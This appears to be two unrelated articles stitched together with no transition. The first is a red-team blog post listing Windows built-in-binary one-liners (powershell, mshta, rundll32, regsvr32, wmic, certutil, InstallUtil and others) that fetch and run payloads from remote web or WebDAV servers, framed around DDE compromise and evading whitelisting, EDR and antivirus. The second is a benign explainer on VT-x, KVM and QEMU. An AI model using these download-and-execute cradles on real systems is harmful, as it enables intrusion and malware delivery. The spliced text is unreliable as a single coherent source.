In the wake of the recent buzz and trend in using DDE for executing arbitrary command lines and eventually compromising a system, I asked myself « what are the coolest command lines an attacker could use besides the famous powershell oneliner » ?

These command lines need to fulfill the following prerequisites:

  • allow for execution of arbitrary code – because spawning calc.exe is cool, but has its limits huh ?
  • allow for downloading its payload from a remote server – because your super malware/RAT/agent will probably not fit into a single command line, does it ?
  • be proxy aware – because which company doesn’t use a web proxy for outgoing traffic nowadays ?
  • make use of as standard and widely deployed Microsoft binaries as possible – because you want this command line to execute on as much systems as possible
  • be EDR friendly – oh well, Office spawning cmd.exe is already a bad sign, but what about powershell.exe or cscript.exe downloading stuff from the internet ?
  • work in memory only – because your final payload might get caught by AV when written on disk

A lot of awesome work has been done by a lot of people, especially @subTee, regarding application whitelisting bypass, which is eventually what we want: execute arbitrary code abusing Microsoft built-in binaries.

Let’s be clear that not all command lines will fulfill all of the above points. Especially the « do not write the payload on disk » one, because most of the time the downloaded file will end-up in a local cache.

When it comes to downloading a payload from a remote server, it basically boils down to 3 options:

  1. either the command itself accepts an HTTP URL as one of its arguments
  2. the command accepts a UNC path (pointing to a WebDAV server)
  3. the command can execute a small inline script with a download cradle

Depending on the version of Windows (7, 10), the local cache for objects downloaded over HTTP will be the IE local cache, in one the following location:

  • C:\Users\<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\
  • C:\Users\<username>\AppData\Local\Microsoft\Windows\INetCache\IE\<subdir>

On the other hand, files accessed via a UNC path pointing to a WebDAV server will be saved in the WebDAV client local cache:

  • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV

When using a UNC path to point to the WebDAV server hosting the payload, keep in mind that it will only work if the WebClient service is started. In case it’s not started, in order to start it even from a low privileged user, simply prepend your command line with « pushd \\webdavserver & popd ».

In all of the following scenarios, I’ll mention which process is seen as performing the network traffic and where the payload is written on disk.

Powershell


Ok, this is by far the most famous one, but also probably the most monitored oneif not blocked. A well known proxy friendly command line is the following:

1
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"

Process performing network call: powershell.exe
Payload written on disk: NO (at least nowhere I could find using procmon !)

Of course you could also use its encoded counterpart.

But you can also call the payload directly from a WebDAV server:

1
powershell -exec bypass -f \\webdavserver\folder\payload.ps1

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Cmd


Why make things complicated when you can have cmd.exe executing a batch file ? Especially when that batch file can not only execute a series of commands but also, more importantly, embed any file type (scripting, executable, anything that you can think of !). Have a look at my Invoke-EmbedInBatch.ps1 script (heavily inspired by @xorrior work), and see that you can easily drop any binary, dll, script: https://github.com/Arno0x/PowerShellScripts
So once you’ve been creative with your payload as a batch file, go for it:

1
cmd.exe /k < \\webdavserver\folder\batchfile.txt

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Cscript/Wscript


Also very common, but the idea here is to download the payload from a remote server in one command line:

1
cscript //E:jscript \\webdavserver\folder\payload.txt

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Mshta


Mshta really is the same family as cscript/wscript but with the added capability of executing an inline script which will download and execute a scriptlet as a payload:

1
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

Process performing network call: mshta.exe
Payload written on disk: IE local cache

You could also do a much simpler trick since mshta accepts a URL as an argument to execute an HTA file:

1
mshta http://webserver/payload.hta

Process performing network call: mshta.exe
Payload written on disk: IE local cache

Eventually, the following also works, with the advantage of hiding mshta.exe downloading stuff:

1
mshta \\webdavserver\folder\payload.hta

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Rundll32


A well known one as well, can be used in different ways. First one is referring to a standard DLL using a UNC path:

1
rundll32 \\webdavserver\folder\payload.dll,entrypoint

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Rundll32 can also be used to call some inline jscript:

1
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

Process performing network call: rundll32.exe
Payload written on disk: IE local cache

Wmic


Discovered by @subTee with @mattifestation, wmic can invoke an XSL (eXtensible Stylesheet Language) local or remote file, which may contain some scripting of our choice:

1
wmic os get /format:"https://webserver/payload.xsl"

Process performing network call: wmic.exe
Payload written on disk: IE local cache

Regasm/Regsvc


Regasm and Regsvc are one of those fancy application whitelisting bypass techniques discovered by @subTee. You need to create a specific DLL (can be written in .Net/C#) that will expose the proper interfaces, and you can then call it over WebDAV:

1
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Regsvr32


Another one from @subTee. This ones requires a slightly different scriptlet from the mshta one above. First option:

1
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll

Process performing network call: regsvr32.exe
Payload written on disk: IE local cache

Second option using UNC/WebDAV:

1
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Odbcconf


This one is close to the regsvr32 one. Also discovered by @subTee, it can execute a DLL exposing a specific function. To be noted is that the DLL file doesn’t need to have the .dll extension. It can be downloaded using UNC/WebDAV:

1
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Msbuild


Let’s keep going with all these .Net framework utilities discovered by @subTee. You can NOT use msbuild.exe using an inline tasks straight from a UNC path (actually, you can but it gets really messy), so I turned out with the following trick, using msbuild.exe only. Note that it will require to be called within a shell with ENABLEDELAYEDEXPANSION (/V option):

1
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Not sure this one is really useful as is. As we’ll see later, we could use other means of downloading the file locally, and then execute it with msbuild.exe.

Combining some commands


After all, having the possibility to execute a command line (from DDE for instance) doesn’t mean you should restrict yourself to only one command. Commands can be chained to reach an objective.

For instance, the whole payload download part can be done with certutil.exe, again thanks to @subTee for discovering this:

1
certutil -urlcache -split -f http://webserver/payload payload

Now combining some commands in one line, with the InstallUtil.exe executing a specific DLL as a payload:

1
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll

You could simply deliver an executable:

1
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe

There are probably much other ways of achieving the same result, but these command lines do the job while fulfilling most of prerequisites we set at the beginning of this post !

One may wonder why I do not mention the usage of the bitsadmin utility as a means of downloading a payload. I’ve left this one aside on purpose simply because it’s not proxy aware.

Payloads source examples


All the command lines previously cited make use of specific payloads:

  • Various scriplets (.sct), for mshta, rundll32 or regsvr32
  • XSL files for wmic
  • HTML Application (.hta)
  • MSBuild inline tasks (.xml or .csproj)
  • DLL for InstallUtil or Regasm/Regsvc

You can get examples of most payloads from the awesome atomic-red-team repo on Github: https://github.com/redcanaryco/atomic-red-team from @redcanaryco.

You can also get all these payloads automatically generated thanks to the GreatSCT project on Github: https://github.com/GreatSCT/GreatSCT

You can also find some other examples on my gist: https://gist.github.com/Arno0x

Intel Virtualisation: How VT-x, KVM and QEMU Work Together

VT-x is name of CPU virtualisation technology by Intel. KVM is component of Linux kernel which makes use of VT-x. And QEMU is a user-space application which allows users to create virtual machines. QEMU makes use of KVM to achieve efficient virtualisation. In this article we will talk about how these three technologies work together. Don’t expect an in-depth exposition about all aspects here, although in future, I might follow this up with more focused posts about some specific parts.

Something About Virtualisation First

Let’s first touch upon some theory before going into main discussion. Related to virtualisation is concept of emulation – in simple words, faking the hardware. When you use QEMU or VMWare to create a virtual machine that has ARM processor, but your host machine has an x86 processor, then QEMU or VMWare would emulate or fake ARM processor. When we talk about virtualisation we mean hardware assisted virtualisation where the VM’s processor matches host computer’s processor. Often conflated with virtualisation is an even more distinct concept of containerisation. Containerisation is mostly a software concept and it builds on top of operating system abstractions like process identifiers, file system and memory consumption limits. In this post we won’t discuss containers any more.

A typical VM set up looks like below:

vm-arch

 

At the lowest level is hardware which supports virtualisation. Above it, hypervisor or virtual machine monitor (VMM). In case of KVM, this is actually Linux kernel which has KVM modules loaded into it. In other words, KVM is a set of kernel modules that when loaded into Linux kernel turn the kernel into hypervisor. Above the hypervisor, and in user space, sit virtualisation applications that end users directly interact with – QEMU, VMWare etc. These applications then create virtual machines which run their own operating systems, with cooperation from hypervisor.

Finally, there is “full” vs. “para” virtualisation dichotomy. Full virtualisation is when OS that is running inside a VM is exactly the same as would be running on real hardware. Paravirtualisation is when OS inside VM is aware that it is being virtualised and thus runs in a slightly modified way than it would on real hardware.

VT-x

VT-x is CPU virtualisation for Intel 64 and IA-32 architecture. For Intel’s Itanium, there is VT-I. For I/O virtualisation there is VT-d. AMD also has its virtualisation technology called AMD-V. We will only concern ourselves with VT-x.

Under VT-x a CPU operates in one of two modes: root and non-root. These modes are orthogonal to real, protected, long etc, and also orthogonal to privilege rings (0-3). They form a new “plane” so to speak. Hypervisor runs in root mode and VMs run in non-root mode. When in non-root mode, CPU-bound code mostly executes in the same way as it would if running in root mode, which means that VM’s CPU-bound operations run mostly at native speed. However, it doesn’t have full freedom.

Privileged instructions form a subset of all available instructions on a CPU. These are instructions that can only be executed if the CPU is in higher privileged state, e.g. current privilege level (CPL) 0 (where CPL 3 is least privileged). A subset of these privileged instructions are what we can call “global state-changing” instructions – those which affect the overall state of CPU. Examples are those instructions which modify clock or interrupt registers, or write to control registers in a way that will change the operation of root mode. This smaller subset of sensitive instructions are what the non-root mode can’t execute.

VMX and VMCS

Virtual Machine Extensions (VMX) are instructions that were added to facilitate VT-x. Let’s look at some of them to gain a better understanding of how VT-x works.

VMXON: Before this instruction is executed, there is no concept of root vs non-root modes. The CPU operates as if there was no virtualisation. VMXON must be executed in order to enter virtualisation. Immediately after VMXON, the CPU is in root mode.

VMXOFF: Converse of VMXON, VMXOFF exits virtualisation.

VMLAUNCH: Creates an instance of a VM and enters non-root mode. We will explain what we mean by “instance of VM” in a short while, when covering VMCS. For now think of it as a particular VM created inside QEMU or VMWare.

VMRESUME: Enters non-root mode for an existing VM instance.

When a VM attempts to execute an instruction that is prohibited in non-root mode, CPU immediately switches to root mode in a trap-like way. This is called a VM exit.

Let’s synthesise the above information. CPU starts in a normal mode, executes VMXON to start virtualisation in root mode, executes VMLAUNCH to create and enter non-root mode for a VM instance, VM instance runs its own code as if running natively until it attempts something that is prohibited, that causes a VM exit and a switch to root mode. Recall that the software running in root mode is hypervisor. Hypervisor takes action to deal with the reason for VM exit and then executes VMRESUME to re-enter non-root mode for that VM instance, which lets the VM instance resume its operation. This interaction between root and non-root mode is the essence of hardware virtualisation support.

Of course the above description leaves some gaps. For example, how does hypervisor know why VM exit happened? And what makes one VM instance different from another? This is where VMCS comes in. VMCS stands for Virtual Machine Control Structure. It is basically a 4KiB part of physical memory which contains information needed for the above process to work. This information includes reasons for VM exit as well as information unique to each VM instance so that when CPU is in non-root mode, it is the VMCS which determines which instance of VM it is running.

As you may know, in QEMU or VMWare, we can decide how many CPUs a particular VM will have. Each such CPU is called a virtual CPU or vCPU. For each vCPU there is one VMCS. This means that VMCS stores information on CPU-level granularity and not VM level. To read and write a particular VMCS, VMREAD and VMWRITE instructions are used. They effectively require root mode so only hypervisor can modify VMCS. Non-root VM can perform VMWRITE but not to the actual VMCS, but a “shadow” VMCS – something that doesn’t concern us immediately.

There are also instructions that operate on whole VMCS instances rather than individual VMCSs. These are used when switching between vCPUs, where a vCPU could belong to any VM instance. VMPTRLD is used to load the address of a VMCS and VMPTRST is used to store this address to a specified memory address. There can be many VMCS instances but only one is marked as current and active at any point. VMPTRLD marks a particular VMCS as active. Then, when VMRESUME is executed, the non-root mode VM uses that active VMCS instance to know which particular VM and vCPU it is executing as.

Here it’s worth noting that all the VMX instructions above require CPL level 0, so they can only be executed from inside the Linux kernel (or other OS kernel).

VMCS basically stores two types of information:

  1. Context info which contains things like CPU register values to save and restore during transitions between root and non-root.
  2. Control info which determines behaviour of the VM inside non-root mode.

More specifically, VMCS is divided into six parts.

  1. Guest-state stores vCPU state on VM exit. On VMRESUME, vCPU state is restored from here.
  2. Host-state stores host CPU state on VMLAUNCH and VMRESUME. On VM exit, host CPU state is restored from here.
  3. VM execution control fields determine the behaviour of VM in non-root mode. For example hypervisor can set a bit in a VM execution control field such that whenever VM attempts to execute RDTSC instruction to read timestamp counter, the VM exits back to hypervisor.
  4. VM exit control fields determine the behaviour of VM exits. For example, when a bit in VM exit control part is set then debug register DR7 is saved whenever there is a VM exit.
  5. VM entry control fields determine the behaviour of VM entries. This is counterpart of VM exit control fields. A symmetric example is that setting a bit inside this field will cause the VM to always load DR7 debug register on VM entry.
  6. VM exit information fields tell hypervisor why the exit happened and provide additional information.

There are other aspects of hardware virtualisation support that we will conveniently gloss over in this post. Virtual to physical address conversion inside VM is done using a VT-x feature called Extended Page Tables (EPT). Translation Lookaside Buffer (TLB) is used to cache virtual to physical mappings in order to save page table lookups. TLB semantics also change to accommodate virtual machines. Advanced Programmable Interrupt Controller (APIC) on a real machine is responsible for managing interrupts. In VM this too is virtualised and there are virtual interrupts which can be controlled by one of the control fields in VMCS. I/O is a major part of any machine’s operations. Virtualising I/O is not covered by VT-x and is usually emulated in user space or accelerated by VT-d.

KVM

Kernel-based Virtual Machine (KVM) is a set of Linux kernel modules that when loaded, turn Linux kernel into hypervisor. Linux continues its normal operations as OS but also provides hypervisor facilities to user space. KVM modules can be grouped into two types: core module and machine specific modules. kvm.ko is the core module which is always needed. Depending on the host machine CPU, a machine specific module, like kvm-intel.ko or kvm-amd.ko will be needed. As you can guess, kvm-intel.ko uses the functionality we described above in VT-x section. It is KVM which executes VMLAUNCH/VMRESUME, sets up VMCS, deals with VM exits etc. Let’s also mention that AMD’s virtualisation technology AMD-V also has its own instructions and they are called Secure Virtual Machine (SVM). Under `arch/x86/kvm/` you will find files named `svm.c` and `vmx.c`. These contain code which deals with virtualisation facilities of AMD and Intel respectively.

KVM interacts with user space – in our case QEMU – in two ways: through device file `/dev/kvm` and through memory mapped pages. Memory mapped pages are used for bulk transfer of data between QEMU and KVM. More specifically, there are two memory mapped pages per vCPU and they are used for high volume data transfer between QEMU and the VM in kernel.

`/dev/kvm` is the main API exposed by KVM. It supports a set of `ioctl`s which allow QEMU to manage VMs and interact with them. The lowest unit of virtualisation in KVM is a vCPU. Everything builds on top of it. The `/dev/kvm` API is a three-level hierarchy.

  1. System Level: Calls this API manipulate the global state of the whole KVM subsystem. This, among other things, is used to create VMs.
  2. VM Level: Calls to this API deal with a specific VM. vCPUs are created through calls to this API.
  3. vCPU Level: This is lowest granularity API and deals with a specific vCPU. Since QEMU dedicates one thread to each vCPU (see QEMU section below), calls to this API are done in the same thread that was used to create the vCPU.

After creating vCPU QEMU continues interacting with it using the ioctls and memory mapped pages.

QEMU

Quick Emulator (QEMU) is the only user space component we are considering in our VT-x/KVM/QEMU stack. With QEMU one can run a virtual machine with ARM or MIPS core but run on an Intel host. How is this possible? Basically QEMU has two modes: emulator and virtualiser. As an emulator, it can fake the hardware. So it can make itself look like a MIPS machine to the software running inside its VM. It does that through binary translation. QEMU comes with Tiny Code Generator (TCG). This can be thought if as a sort of high-level language VM, like JVM. It takes for instance, MIPS code, converts it to an intermediate bytecode which then gets executed on the host hardware.

The other mode of QEMU – as a virtualiser – is what achieves the type of virtualisation that we are discussing here. As virtualiser it gets help from KVM. It talks to KVM using ioctl’s as described above.

QEMU creates one process for every VM. For each vCPU, QEMU creates a thread. These are regular threads and they get scheduled by the OS like any other thread. As these threads get run time, QEMU creates impression of multiple CPUs for the software running inside its VM. Given QEMU’s roots in emulation, it can emulate I/O which is something that KVM may not fully support – take example of a VM with particular serial port on a host that doesn’t have it. Now, when software inside VM performs I/O, the VM exits to KVM. KVM looks at the reason and passes control to QEMU along with pointer to info about the I/O request. QEMU emulates the I/O device for that requests – thus fulfilling it for software inside VM – and passes control back to KVM. KVM executes a VMRESUME to let that VM proceed.

In the end, let us summarise the overall picture in a diagram:

overall-diag